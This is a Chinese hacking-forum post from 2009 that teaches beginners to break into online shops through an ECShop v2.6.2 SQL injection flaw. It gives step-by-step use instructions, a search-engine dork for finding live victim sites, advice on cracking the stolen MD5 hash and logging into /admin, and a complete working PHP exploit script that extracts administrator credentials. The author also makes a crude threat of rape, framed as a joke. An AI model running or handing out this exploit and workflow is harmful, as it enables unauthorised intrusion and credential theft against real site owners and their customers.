ECShop最新漏洞使用和拿站

ECShop, 最新漏洞, exploit

本帖最后由惘然于 2009-3-25 20:40 编辑

实在没被缠得没办法了，写个这玩意给新手朋友们，老鸟直接飘过，不飘拉下来打死！
厚着脸皮发到这里吧，俺真不知道该发哪去.漏洞不是偶发现滴，EXP不是俺写滴，发原创版块好象不好，暂时将就下。不妥就转走

ECShop是一套开源的网店程序，一直以来也是漏洞颇多...
昨天狼族公布了一个目前最新版本的漏洞。出错的代码是

if (empty($_GET['type']))
{
...
}
elseif ($_GET['type'] == 'collection')
{
...
}
$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
$res = $db->query($sql);

复制代码

由于$sql没有初始化,存在一个明显的漏洞。使用者能够直接通过这个编译好EXP在本机得到网站管理员的帐号和MD5格式存放的密码。

利用代码在最下面，我们现在来说说如何使用它来进行拿站，但你必须先做下准备工作，具体如下

因为是PHP的exp 所以首先你必须具备PHP的环境，去网上下个PHP5看着说明装就是了。
假如我们已经在本机安装好了，那么现在开始进入正题了
首先新建一个记事本，然后把利用代码复制到里面，然后另存为一个扩展名为PHP的文件，名字自己取。所以我的是1.php
然后把1.PHP放入你PHP的文件夹中,你装在哪就放在哪，我的在C盘叫PHP5，所以我放那里面。
然后复制一个CMD进你PHP5的文件夹中，看下图，

做好这一切然后我们可以开始拿站了!

首先打开CMD 在当前目录下输入php 1.php 先试下如果命令执行完成,如下图；

那么我们可以开始寻找网站了。接下来我们打开百度，在高级搜索里输入关键字Powered by ECShop v2.6.2 后面想填啥就啥，不写也得我已这个版本来找的，把它设置成每页显示100条,然后点搜索，百度里出现的站大多数使用这一套程序的，虽然不是很多也够你玩了。

接下来我们随便找个站的连接，打开确定下是否是ECShop的程序或者连接正常没有
都是的话我们把记好地址，在CMD下输入php 1.php www.xxxx.com / 把中间的地址换成你的.记得要斜杠.
回车运行一下,如果出现入下图一般就是不成功，继续换个再试！！

接下来我又换了一个,继续执行刚才的命令!!

这次是成功了，帐号和MD5都出来了，接着就是去破MD5进后台的事了. ECSHOP的默认后台一般都是\admin 地址后面加上就是了

就这些吧，郁闷，去玩吧！！

以后别叫我写这种,不然我真去你家强奸你姐了，反正大家都熟一家人以后还要好说话!!

exploit 利用代码：

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
* works with register_globals = On
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$resp = send();
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
if ($hash)
exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
exit("Exploit Failed!\n");
function send()
{
global $host, $path;
$cmd = 'sql=Select CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user Where action_list=0x'.bin2hex('all').' LIMIT 1#';
$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: Close\r\n\r\n";
$data .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>